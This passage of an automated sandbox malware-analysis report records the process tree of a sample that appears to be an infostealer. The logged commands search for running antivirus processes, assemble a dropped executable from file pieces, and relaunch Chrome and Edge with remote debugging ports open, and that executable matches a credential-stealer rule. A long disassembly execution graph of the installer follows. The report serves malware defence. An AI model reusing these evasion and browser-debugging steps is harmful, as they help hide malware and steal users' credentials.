                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                                                Start time:07:45:56
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                Imagebase:0x460000
                                                                                                                                                                                                                                                                File size:29'696 bytes
                                                                                                                                                                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                                                Start time:07:45:58
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:cmd /c md 615578
                                                                                                                                                                                                                                                                Imagebase:0xa40000
                                                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                                                Start time:07:45:58
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:findstr /V "applied" Manually
                                                                                                                                                                                                                                                                Imagebase:0x460000
                                                                                                                                                                                                                                                                File size:29'696 bytes
                                                                                                                                                                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                                                Start time:07:45:58
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:cmd /c copy /b ..\Saddam + ..\Intro + ..\Perfectly + ..\Robertson + ..\Warm w
                                                                                                                                                                                                                                                                Imagebase:0xa40000
                                                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                                                Start time:07:45:58
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:Participating.com w
                                                                                                                                                                                                                                                                Imagebase:0xce0000
                                                                                                                                                                                                                                                                File size:947'288 bytes
                                                                                                                                                                                                                                                                MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                                                Start time:07:45:58
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                Imagebase:0xab0000
                                                                                                                                                                                                                                                                File size:28'160 bytes
                                                                                                                                                                                                                                                                MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                                                Start time:07:46:53
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                Imagebase:0x7ff678760000
                                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                                                Start time:07:46:54
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2524 --field-trial-handle=2184,i,9525037669087929347,3886013468471242407,262144 /prefetch:8
                                                                                                                                                                                                                                                                Imagebase:0x7ff678760000
                                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                                                Start time:07:47:08
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                                                Start time:07:47:09
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2792 --field-trial-handle=2572,i,5816379547716917,6542547351342202876,262144 /prefetch:3
                                                                                                                                                                                                                                                                Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                                                Start time:07:47:09
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                                                Start time:07:47:09
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2828 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:3
                                                                                                                                                                                                                                                                Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                                                Start time:07:47:14
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6452 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:8
                                                                                                                                                                                                                                                                Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                                                                                Start time:07:47:14
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6620 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:8
                                                                                                                                                                                                                                                                Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                  Execution Coverage:17.7%
                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                  Signature Coverage:21%
                                                                                                                                                                                                                                                                  Total number of Nodes:1482
                                                                                                                                                                                                                                                                  Total number of Limit Nodes:27
                                                                                                                                                                                                                                                                  execution_graph 4201 402fc0 4202 401446 18 API calls 4201->4202 4203 402fc7 4202->4203 4204 401a13 4203->4204 4205 403017 4203->4205 4206 40300a 4203->4206 4208 406831 18 API calls 4205->4208 4207 401446 18 API calls 4206->4207 4207->4204 4208->4204 4209 4023c1 4210 40145c 18 API calls 4209->4210 4211 4023c8 4210->4211 4214 407296 4211->4214 4217 406efe CreateFileW 4214->4217 4218 406f30 4217->4218 4219 406f4a ReadFile 4217->4219 4220 4062cf 11 API calls 4218->4220 4221 4023d6 4219->4221 4224 406fb0 4219->4224 4220->4221 4222 406fc7 ReadFile lstrcpynA lstrcmpA 4222->4224 4225 40700e SetFilePointer ReadFile 4222->4225 4223 40720f CloseHandle 4223->4221 4224->4221 4224->4222 4224->4223 4226 407009 4224->4226 4225->4223 4227 4070d4 ReadFile 4225->4227 4226->4223 4228 407164 4227->4228 4228->4226 4228->4227 4229 40718b SetFilePointer GlobalAlloc ReadFile 4228->4229 4230 4071eb lstrcpynW GlobalFree 4229->4230 4231 4071cf 4229->4231 4230->4223 4231->4230 4231->4231 4232 401cc3 4233 40145c 18 API calls 4232->4233 4234 401cca lstrlenW 4233->4234 4235 4030dc 4234->4235 4236 4030e3 4235->4236 4238 405f7d wsprintfW 4235->4238 4238->4236 4239 401c46 4240 40145c 18 API calls 4239->4240 4241 401c4c 4240->4241 4242 4062cf 11 API calls 4241->4242 4243 401c59 4242->4243 4244 406cc7 81 API calls 4243->4244 4245 401c64 4244->4245 4246 403049 4247 401446 18 API calls 4246->4247 4248 403050 4247->4248 4249 406831 18 API calls 4248->4249 4250 401a13 4248->4250 4249->4250 4251 40204a 4252 401446 18 API calls 4251->4252 4253 402051 IsWindow 4252->4253 4254 4018d3 4253->4254 4255 40324c 4256 403277 4255->4256 4257 40325e SetTimer 4255->4257 4258 4032cc 4256->4258 4259 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4256->4259 4257->4256 4259->4258 4260 4022cc 4261 40145c 18 API calls 4260->4261 4262 4022d3 4261->4262 4263 406301 2 API calls 4262->4263 4264 4022d9 4263->4264 4266 4022e8 4264->4266 4269 405f7d wsprintfW 4264->4269 4267 4030e3 4266->4267 4270 405f7d wsprintfW 4266->4270 4269->4266 4270->4267 4271 4030cf 4272 40145c 18 API calls 4271->4272 4273 4030d6 4272->4273 4275 4030dc 4273->4275 4278 4063d8 GlobalAlloc lstrlenW 4273->4278 4276 4030e3 4275->4276 4305 405f7d wsprintfW 4275->4305 4279 406460 4278->4279 4280 40640e 4278->4280 4279->4275 4281 40643b GetVersionExW 4280->4281 4306 406057 CharUpperW 4280->4306 4281->4279 4282 40646a 4281->4282 4283 406490 LoadLibraryA 4282->4283 4284 406479 4282->4284 4283->4279 4287 4064ae GetProcAddress GetProcAddress GetProcAddress 4283->4287 4284->4279 4286 4065b1 GlobalFree 4284->4286 4288 4065c7 LoadLibraryA 4286->4288 4289 406709 FreeLibrary 4286->4289 4290 406621 4287->4290 4294 4064d6 4287->4294 4288->4279 4292 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4288->4292 4289->4279 4291 40667d FreeLibrary 4290->4291 4293 406656 4290->4293 4291->4293 4292->4290 4297 406716 4293->4297 4302 4066b1 lstrcmpW 4293->4302 4303 4066e2 CloseHandle 4293->4303 4304 406700 CloseHandle 4293->4304 4294->4290 4295 406516 4294->4295 4296 4064fa FreeLibrary GlobalFree 4294->4296 4295->4286 4298 406528 lstrcpyW OpenProcess 4295->4298 4300 40657b CloseHandle CharUpperW lstrcmpW 4295->4300 4296->4279 4299 40671b CloseHandle FreeLibrary 4297->4299 4298->4295 4298->4300 4301 406730 CloseHandle 4299->4301 4300->4290 4300->4295 4301->4299 4302->4293 4302->4301 4303->4293 4304->4289 4305->4276 4306->4280 4307 4044d1 4308 40450b 4307->4308 4309 40453e 4307->4309 4375 405cb0 GetDlgItemTextW 4308->4375 4310 40454b GetDlgItem GetAsyncKeyState 4309->4310 4314 4045dd 4309->4314 4312 40456a GetDlgItem 4310->4312 4325 404588 4310->4325 4317 403d6b 19 API calls 4312->4317 4313 4046c9 4373 40485f 4313->4373 4377 405cb0 GetDlgItemTextW 4313->4377 4314->4313 4322 406831 18 API calls 4314->4322 4314->4373 4315 404516 4316 406064 5 API calls 4315->4316 4318 40451c 4316->4318 4320 40457d ShowWindow 4317->4320 4321 403ea0 5 API calls 4318->4321 4320->4325 4326 404521 GetDlgItem 4321->4326 4327 40465b SHBrowseForFolderW 4322->4327 4323 4046f5 4328 4067aa 18 API calls 4323->4328 4324 403df6 8 API calls 4329 404873 4324->4329 4330 4045a5 SetWindowTextW 4325->4330 4334 405d85 4 API calls 4325->4334 4331 40452f IsDlgButtonChecked 4326->4331 4326->4373 4327->4313 4333 404673 CoTaskMemFree 4327->4333 4338 4046fb 4328->4338 4332 403d6b 19 API calls 4330->4332 4331->4309 4336 4045c3 4332->4336 4337 40674e 3 API calls 4333->4337 4335 40459b 4334->4335 4335->4330 4342 40674e 3 API calls 4335->4342 4339 403d6b 19 API calls 4336->4339 4340 404680 4337->4340 4378 406035 lstrcpynW 4338->4378 4343 4045ce 4339->4343 4344 4046b7 SetDlgItemTextW 4340->4344 4349 406831 18 API calls 4340->4349 4342->4330 4376 403dc4 SendMessageW 4343->4376 4344->4313 4345 404712 4347 406328 3 API calls 4345->4347 4356 40471a 4347->4356 4348 4045d6 4350 406328 3 API calls 4348->4350 4351 40469f lstrcmpiW 4349->4351 4350->4314 4351->4344 4354 4046b0 lstrcatW 4351->4354 4352 40475c 4379 406035 lstrcpynW 4352->4379 4354->4344 4355 404765 4357 405d85 4 API calls 4355->4357 4356->4352 4360 40677d 2 API calls 4356->4360 4362 4047b1 4356->4362 4358 40476b GetDiskFreeSpaceW 4357->4358 4361 40478f MulDiv 4358->4361 4358->4362 4360->4356 4361->4362 4363 40480e 4362->4363 4380 4043d9 4362->4380 4364 404831 4363->4364 4366 40141d 80 API calls 4363->4366 4388 403db1 KiUserCallbackDispatcher 4364->4388 4366->4364 4367 4047ff 4369 404810 SetDlgItemTextW 4367->4369 4370 404804 4367->4370 4369->4363 4372 4043d9 21 API calls 4370->4372 4371 40484d 4371->4373 4389 403d8d 4371->4389 4372->4363 4373->4324 4375->4315 4376->4348 4377->4323 4378->4345 4379->4355 4381 4043f9 4380->4381 4382 406831 18 API calls 4381->4382 4383 404439 4382->4383 4384 406831 18 API calls 4383->4384 4385 404444 4384->4385 4386 406831 18 API calls 4385->4386 4387 404454 lstrlenW wsprintfW SetDlgItemTextW 4386->4387 4387->4367 4388->4371 4390 403da0 SendMessageW 4389->4390 4391 403d9b 4389->4391 4390->4373 4391->4390 4392 401dd3 4393 401446 18 API calls 4392->4393 4394 401dda 4393->4394 4395 401446 18 API calls 4394->4395 4396 4018d3 4395->4396 4397 402e55 4398 40145c 18 API calls 4397->4398 4399 402e63 4398->4399 4400 402e79 4399->4400 4401 40145c 18 API calls 4399->4401 4402 405e5c 2 API calls 4400->4402 4401->4400 4403 402e7f 4402->4403 4427 405e7c GetFileAttributesW CreateFileW 4403->4427 4405 402e8c 4406 402f35 4405->4406 4407 402e98 GlobalAlloc 4405->4407 4410 4062cf 11 API calls 4406->4410 4408 402eb1 4407->4408 4409 402f2c CloseHandle 4407->4409 4428 403368 SetFilePointer 4408->4428 4409->4406 4412 402f45 4410->4412 4414 402f50 DeleteFileW 4412->4414 4415 402f63 4412->4415 4413 402eb7 4416 403336 ReadFile 4413->4416 4414->4415 4429 401435 4415->4429 4418 402ec0 GlobalAlloc 4416->4418 4419 402ed0 4418->4419 4420 402f04 WriteFile GlobalFree 4418->4420 4422 40337f 33 API calls 4419->4422 4421 40337f 33 API calls 4420->4421 4423 402f29 4421->4423 4426 402edd 4422->4426 4423->4409 4425 402efb GlobalFree 4425->4420 4426->4425 4427->4405 4428->4413 4430 404f9e 25 API calls 4429->4430 4431 401443 4430->4431 4432 401cd5 4433 401446 18 API calls 4432->4433 4434 401cdd 4433->4434 4435 401446 18 API calls 4434->4435 4436 401ce8 4435->4436 4437 40145c 18 API calls 4436->4437 4438 401cf1 4437->4438 4439 401d07 lstrlenW 4438->4439 4440 401d43 4438->4440 4441 401d11 4439->4441 4441->4440 4445 406035 lstrcpynW 4441->4445 4443 401d2c 4443->4440 4444 401d39 lstrlenW 4443->4444 4444->4440 4445->4443 4446 402cd7 4447 401446 18 API calls 4446->4447 4449 402c64 4447->4449 4448 402d17 ReadFile 4448->4449 4449->4446 4449->4448 4450 402d99 4449->4450 4451 402dd8 4452 4030e3 4451->4452 4453 402ddf 4451->4453 4454 402de5 FindClose 4453->4454 4454->4452 4455 401d5c 4456 40145c 18 API calls 4455->4456 4457 401d63 4456->4457 4458 40145c 18 API calls 4457->4458 4459 401d6c 4458->4459 4460 401d73 lstrcmpiW 4459->4460 4461 401d86 lstrcmpW 4459->4461 4462 401d79 4460->4462 4461->4462 4463 401c99 4461->4463 4462->4461 4462->4463 4464 4027e3 4465 4027e9 4464->4465 4466 4027f2 4465->4466 4467 402836 4465->4467 4480 401553 4466->4480 4468 40145c 18 API calls 4467->4468 4470 40283d 4468->4470 4472 4062cf 11 API calls 4470->4472 4471 4027f9 4473 40145c 18 API calls 4471->4473 4477 401a13 4471->4477 4474 40284d 4472->4474 4475 40280a RegDeleteValueW 4473->4475 4484 40149d RegOpenKeyExW 4474->4484 4476 4062cf 11 API calls 4475->4476 4479 40282a RegCloseKey 4476->4479 4479->4477 4481 401563 4480->4481 4482 40145c 18 API calls 4481->4482 4483 401589 RegOpenKeyExW 4482->4483 4483->4471 4487 4014c9 4484->4487 4492 401515 4484->4492 4485 4014ef RegEnumKeyW 4486 401501 RegCloseKey 4485->4486 4485->4487 4489 406328 3 API calls 4486->4489 4487->4485 4487->4486 4488 401526 RegCloseKey 4487->4488 4490 40149d 3 API calls 4487->4490 4488->4492 4491 401511 4489->4491 4490->4487 4491->4492 4493 401541 RegDeleteKeyW 4491->4493 4492->4477 4493->4492 4494 4040e4 4495 4040ff 4494->4495 4501 40422d 4494->4501 4497 40413a 4495->4497 4525 403ff6 WideCharToMultiByte 4495->4525 4496 404298 4498 40436a 4496->4498 4499 4042a2 GetDlgItem 4496->4499 4505 403d6b 19 API calls 4497->4505 4506 403df6 8 API calls 4498->4506 4502 40432b 4499->4502 4503 4042bc 4499->4503 4501->4496 4501->4498 4504 404267 GetDlgItem SendMessageW 4501->4504 4502->4498 4507 40433d 4502->4507 4503->4502 4511 4042e2 6 API calls 4503->4511 4530 403db1 KiUserCallbackDispatcher 4504->4530 4509 40417a 4505->4509 4510 404365 4506->4510 4512 404353 4507->4512 4513 404343 SendMessageW 4507->4513 4515 403d6b 19 API calls 4509->4515 4511->4502 4512->4510 4516 404359 SendMessageW 4512->4516 4513->4512 4514 404293 4517 403d8d SendMessageW 4514->4517 4518 404187 CheckDlgButton 4515->4518 4516->4510 4517->4496 4528 403db1 KiUserCallbackDispatcher 4518->4528 4520 4041a5 GetDlgItem 4529 403dc4 SendMessageW 4520->4529 4522 4041bb SendMessageW 4523 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4041d8 GetSysColor 4522->4524 4523->4510 4524->4523 4526 404033 4525->4526 4527 404015 GlobalAlloc WideCharToMultiByte 4525->4527 4526->4497 4527->4526 4528->4520 4529->4522 4530->4514 4531 402ae4 4532 402aeb 4531->4532 4533 4030e3 4531->4533 4534 402af2 CloseHandle 4532->4534 4534->4533 4535 402065 4536 401446 18 API calls 4535->4536 4537 40206d 4536->4537 4538 401446 18 API calls 4537->4538 4539 402076 GetDlgItem 4538->4539 4540 4030dc 4539->4540 4541 4030e3 4540->4541 4543 405f7d wsprintfW 4540->4543 4543->4541 4544 402665 4545 40145c 18 API calls 4544->4545 4546 40266b 4545->4546 4547 40145c 18 API calls 4546->4547 4548 402674 4547->4548 4549 40145c 18 API calls 4548->4549 4550 40267d 4549->4550 4551 4062cf 11 API calls 4550->4551 4552 40268c 4551->4552 4553 406301 2 API calls 4552->4553 4554 402695 4553->4554 4555 4026a6 lstrlenW lstrlenW 4554->4555 4557 404f9e 25 API calls 4554->4557 4559 4030e3 4554->4559 4556 404f9e 25 API calls 4555->4556 4558 4026e8 SHFileOperationW 4556->4558 4557->4554 4558->4554 4558->4559 4560 401c69 4561 40145c 18 API calls 4560->4561 4562 401c70 4561->4562 4563 4062cf 11 API calls 4562->4563 4564 401c80 4563->4564 4565 405ccc MessageBoxIndirectW 4564->4565 4566 401a13 4565->4566 4567 402f6e 4568 402f72 4567->4568 4569 402fae 4567->4569 4571 4062cf 11 API calls 4568->4571 4570 40145c 18 API calls 4569->4570 4577 402f9d 4570->4577 4572 402f7d 4571->4572 4573 4062cf 11 API calls 4572->4573 4574 402f90 4573->4574 4575 402fa2 4574->4575 4576 402f98 4574->4576 4579 406113 9 API calls 4575->4579 4578 403ea0 5 API calls 4576->4578 4578->4577 4579->4577 4580 4023f0 4581 402403 4580->4581 4582 4024da 4580->4582 4583 40145c 18 API calls 4581->4583 4584 404f9e 25 API calls 4582->4584 4585 40240a 4583->4585 4588 4024f1 4584->4588 4586 40145c 18 API calls 4585->4586 4587 402413 4586->4587 4589 402429 LoadLibraryExW 4587->4589 4590 40241b GetModuleHandleW 4587->4590 4591 4024ce 4589->4591 4592 40243e 4589->4592 4590->4589 4590->4592 4594 404f9e 25 API calls 4591->4594 4604 406391 GlobalAlloc WideCharToMultiByte 4592->4604 4594->4582 4595 402449 4596 40248c 4595->4596 4597 40244f 4595->4597 4598 404f9e 25 API calls 4596->4598 4599 401435 25 API calls 4597->4599 4602 40245f 4597->4602 4600 402496 4598->4600 4599->4602 4601 4062cf 11 API calls 4600->4601 4601->4602 4602->4588 4603 4024c0 FreeLibrary 4602->4603 4603->4588 4605 4063c9 GlobalFree 4604->4605 4606 4063bc GetProcAddress 4604->4606 4605->4595 4606->4605 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4607 4048f8 4608 404906 4607->4608 4609 40491d 4607->4609 4610 40490c 4608->4610 4625 404986 4608->4625 4611 40492b IsWindowVisible 4609->4611 4617 404942 4609->4617 4612 403ddb SendMessageW 4610->4612 4614 404938 4611->4614 4611->4625 4615 404916 4612->4615 4613 40498c CallWindowProcW 4613->4615 4626 40487a SendMessageW 4614->4626 4617->4613 4631 406035 lstrcpynW 4617->4631 4619 404971 4632 405f7d wsprintfW 4619->4632 4621 404978 4622 40141d 80 API calls 4621->4622 4623 40497f 4622->4623 4633 406035 lstrcpynW 4623->4633 4625->4613 4627 4048d7 SendMessageW 4626->4627 4628 40489d 